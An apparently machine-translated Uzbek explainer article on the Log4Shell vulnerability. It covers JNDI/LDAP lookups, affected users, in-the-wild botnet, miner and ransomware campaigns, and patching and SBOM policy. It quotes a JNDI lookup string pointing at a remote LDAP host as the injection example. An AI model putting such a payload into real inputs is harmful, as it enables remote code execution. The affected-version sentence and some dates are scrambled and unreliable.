Mundarija[Yashirish][Show]
2021-yil noyabr oyi oxirida biz kiberxavfsizlikka katta tahdidni aniqladik. Ushbu ekspluatatsiya butun dunyo bo'ylab millionlab kompyuter tizimlariga ta'sir qilishi mumkin.
Bu Log4j zaifligi va e'tibordan chetda qolgan dizayndagi nuqsonlar jahon kompyuter xizmatlarining 90% dan ortig'i hujumga ochiq bo'lishi haqida qo'llanma.
Apache Log4j - bu Apache Software Foundation tomonidan ishlab chiqilgan Java-ga asoslangan ochiq manbali logging yordam dasturi. Dastlab 2001 yilda Ceki Gülcü tomonidan yozilgan bo'lib, hozirda u Apache Software Foundation loyihasi bo'lgan Apache Logging Services tarkibiga kiradi.
Butun dunyodagi kompaniyalar Log4j kutubxonasidan o'z ilovalarida tizimga kirishni yoqish uchun foydalanadilar. Aslida, Java kutubxonasi juda keng tarqalgan, siz uni Amazon, Microsoft, Google va boshqalarning ilovalarida topishingiz mumkin.
Kutubxonaning mashhurligi koddagi har qanday potentsial nuqson millionlab kompyuterlarni buzish uchun ochiq qoldirishi mumkinligini anglatadi. 24 yil 2021 noyabrda A bulut xavfsizligi Alibaba kompaniyasida ishlaydigan tadqiqotchi dahshatli kamchilikni aniqladi.
Log4Shell nomi bilan ham ma'lum bo'lgan Log4j zaifligi 2013 yildan beri sezilmay kelmoqda. Zaiflik zararli aktyorlarga Log4j bilan ishlaydigan ta'sirlangan tizimlarda kod ishlatish imkonini berdi. U 9-yil 2021-dekabrda ommaga oshkor qilingan
Sanoat mutaxassislari Log4Shell kamchiligini chaqirishadi oxirgi xotiradagi eng katta zaiflik.
Zaiflik e'lon qilinganidan keyingi haftada kiberxavfsizlik guruhlari millionlab hujumlarni aniqladi. Ba'zi tadqiqotchilar hatto daqiqada yuzdan ortiq hujum tezligini kuzatdilar.
Bu qanday ishlaydi?
Log4Shell nima uchun bu qadar xavfli ekanligini tushunish uchun biz uning nimaga qodirligini tushunishimiz kerak.
Log4Shell zaifligi kodni o'zboshimchalik bilan bajarishga imkon beradi, bu asosan tajovuzkor maqsadli mashinada istalgan buyruq yoki kodni ishga tushirishi mumkinligini anglatadi.
Buni qanday amalga oshiradi?
Birinchidan, biz JNDI nima ekanligini tushunishimiz kerak.
Java nomlash va katalog interfeysi (JNDI) Java dasturlariga nom orqali ma'lumotlar va resurslarni topish va qidirish imkonini beruvchi Java xizmatidir. Ushbu katalog xizmatlari muhim ahamiyatga ega, chunki ular dasturlarni yaratishda ishlab chiquvchilarga osonlik bilan murojaat qilishlari uchun tashkil etilgan yozuvlar to'plamini taqdim etadi.
JNDI ma'lum bir katalogga kirish uchun turli protokollardan foydalanishi mumkin. Ushbu protokollardan biri Lightweight Directory Access Protocol yoki LDAP hisoblanadi.
Satrni qayd qilishda, log4j shakl ifodalariga duch kelganda satrlarni almashtirishni amalga oshiradi ${prefix:name}
.
Masalan, Text: ${java:version}
Matn sifatida tizimga kiritilishi mumkin: Java versiyasi 1.8.0_65. Bunday almashtirishlar odatiy holdir.
kabi iboralar ham bo'lishi mumkin Text: ${jndi:ldap://example.com/file}
Java obyektini LDAP protokoli orqali URL manzilidan yuklash uchun JNDI tizimidan foydalanadi.
Bu URL manzilidan keladigan ma'lumotlarni mashinaga samarali yuklaydi. Har qanday potentsial xaker zararli kodni umumiy URL manzilida joylashtirishi va Log4j-dan foydalanadigan mashinalar uni tizimga kiritishini kutishi mumkin.
Jurnal xabarlarining mazmuni foydalanuvchi tomonidan boshqariladigan ma'lumotlarni o'z ichiga olganligi sababli, xakerlar o'zlari boshqaradigan LDAP serverlariga ishora qiluvchi o'zlarining JNDI havolalarini kiritishlari mumkin. Ushbu LDAP serverlari JNDI zaiflik orqali amalga oshirishi mumkin bo'lgan zararli Java ob'ektlari bilan to'la bo'lishi mumkin.
Buni yomonlashtiradigan narsa shundaki, dastur server tomoni yoki mijoz tomoni ilovasi bo'ladimi, muhim emas.
Logger uchun tajovuzkorning zararli kodini o'qish usuli mavjud ekan, dastur hali ham ekspluatatsiyalar uchun ochiq.
Kim ta'sir qiladi?
Zaiflik 4 dan 2.0 gacha va shu jumladan, APAche Log2.14.1j dan foydalanadigan barcha tizim va xizmatlarga taʼsir qiladi.
Bir qator xavfsizlik mutaxassislari zaiflik Java-dan foydalanadigan bir qator ilovalarga ta'sir qilishi mumkinligini maslahat berishadi.
Kamchilik birinchi marta Microsoft kompaniyasiga tegishli Minecraft video o'yinida aniqlangan. Microsoft o'z foydalanuvchilarini har qanday xavfning oldini olish uchun Java nashri Minecraft dasturini yangilashga chaqirdi.
Jen Easterly, Kiberxavfsizlik va infratuzilma xavfsizligi agentligi (CISA) direktori sotuvchilarning katta mas'uliyat Yakuniy foydalanuvchilarning ushbu zaiflikdan foydalanadigan zararli shaxslarning oldini olish.
"Sotuvchilar, shuningdek, oxirgi foydalanuvchilar mahsulotida ushbu zaiflikni o'z ichiga olganligini bilishlari va dasturiy ta'minot yangilanishiga ustuvor ahamiyat berishlari uchun o'z mijozlari bilan muloqot qilishlari kerak."
Xabarlarga ko‘ra, hujumlar allaqachon boshlangan. Kiberxavfsizlik dasturiy ta'minotini ta'minlovchi Symantec kompaniyasi turli xil hujum so'rovlarini kuzatdi.
Quyida tadqiqotchilar aniqlagan hujum turlariga misollar keltirilgan:
- botnet
Botnetlar - bu bitta hujum qiluvchi tomonning nazorati ostida bo'lgan kompyuterlar tarmog'i. Ular DDoS hujumlarini amalga oshirish, ma'lumotlarni o'g'irlash va boshqa firibgarliklarni amalga oshirishga yordam beradi. Tadqiqotchilar Muhstik botnetini Log4j ekspluatatsiyasidan yuklab olingan qobiq skriptlarida kuzatdilar.
- XMRig Miner troyan
XMRig - bu Monero tokenini qazib olish uchun protsessorlardan foydalanadigan ochiq manbali kriptovalyuta konchisi. Kiberjinoyatchilar XMRig-ni odamlarning qurilmalariga o'rnatishlari mumkin, shuning uchun ular o'zlarining ishlov berish quvvatlaridan o'zlariga xabarsiz foydalanishlari mumkin.
- Khonsari Ransomware
Ransomware zararli dasturlarning bir turiga ishora qiladi fayllarni shifrlash kompyuterda. Keyin tajovuzkorlar shifrlangan fayllarga kirish huquqini berish evaziga to‘lov talab qilishlari mumkin. Tadqiqotchilar Log4Shell hujumlarida Khonsari to'lov dasturini topdilar. Ular Windows serverlariga mo'ljallangan va .NET ramkasidan foydalanadilar.
Keyin nima bo'ladi?
Mutaxassislarning taxminiga ko'ra, Log4J zaifligi tufayli yuzaga kelgan tartibsizlikni to'liq tuzatish uchun oylar yoki hatto yillar kerak bo'lishi mumkin.
Ushbu jarayon har bir ta'sirlangan tizimni yamalangan versiya bilan yangilashni o'z ichiga oladi. Ushbu tizimlarning barchasi yamalgan bo'lsa ham, hackerlar serverlar hujum uchun ochiq bo'lgan oynaga allaqachon qo'shgan bo'lishi mumkin bo'lgan orqa eshiklar tahdidi mavjud.
ko'p yechimlar va yumshatish choralari ilovalarning ushbu xato tomonidan ishlatilishini oldini olish uchun mavjud. Yangi Log4j 2.15.0-rc1 versiyasi ushbu zaiflikni yumshatish uchun turli xil sozlamalarni o'zgartirdi.
JNDI-dan foydalanadigan barcha funksiyalar sukut bo'yicha o'chirib qo'yiladi va masofaviy qidiruvlar ham cheklangan. Log4j sozlamalarida qidirish funksiyasini oʻchirib qoʻyish mumkin boʻlgan ekspluatatsiyalar xavfini kamaytirishga yordam beradi.
Log4j-dan tashqari, ochiq manbali ekspluatatsiyalarning oldini olish uchun hali ham kengroq rejaga ehtiyoj bor.
May oyi boshida Oq uy e'lon qildi buyruq milliy kiberxavfsizlikni yaxshilashga qaratilgan. U dasturni yaratish uchun zarur bo'lgan har bir element ro'yxatini o'z ichiga olgan rasmiy hujjat bo'lgan dasturiy ta'minot to'plami (SBOM) uchun shartni o'z ichiga olgan.
Bu kabi qismlarni o'z ichiga oladi Ochiq manba paketlar, bog'liqliklar va ishlab chiqish uchun ishlatiladigan API. SBOM g'oyasi shaffoflik uchun foydali bo'lsa-da, u haqiqatan ham iste'molchiga yordam beradimi?
Bog'liqlarni yangilash juda qiyin bo'lishi mumkin. Kompaniyalar muqobil paketlarni topish uchun qo'shimcha vaqt sarflash xavfi o'rniga, har qanday jarimani to'lashni tanlashi mumkin. Ehtimol, bu SBOMlar faqat foydali bo'ladi, agar ular doirasi yanada cheklangan.
Xulosa
Log4j muammosi tashkilotlar uchun shunchaki texnik muammo emas.
Biznes rahbarlari o'zlarining serverlari, mahsulotlari yoki xizmatlari o'zlari saqlamaydigan kodga tayanganda yuzaga kelishi mumkin bo'lgan xavflardan xabardor bo'lishlari kerak.
Ochiq manbali va uchinchi tomon ilovalariga tayanish har doim ma'lum bir xavf bilan birga keladi. Kompaniyalar yangi tahdidlar paydo bo'lishidan oldin xavflarni kamaytirish strategiyalarini ishlab chiqishlari kerak.
Internetning katta qismi butun dunyo bo'ylab minglab ko'ngillilar tomonidan qo'llab-quvvatlanadigan ochiq kodli dasturiy ta'minotga tayanadi.
Agar biz Internetni xavfsiz joyda saqlamoqchi bo'lsak, hukumatlar va korporatsiyalar ochiq manbali sa'y-harakatlarni va kiberxavfsizlik agentliklarini moliyalashtirishga sarmoya kiritishlari kerak. CISA.
Leave a Reply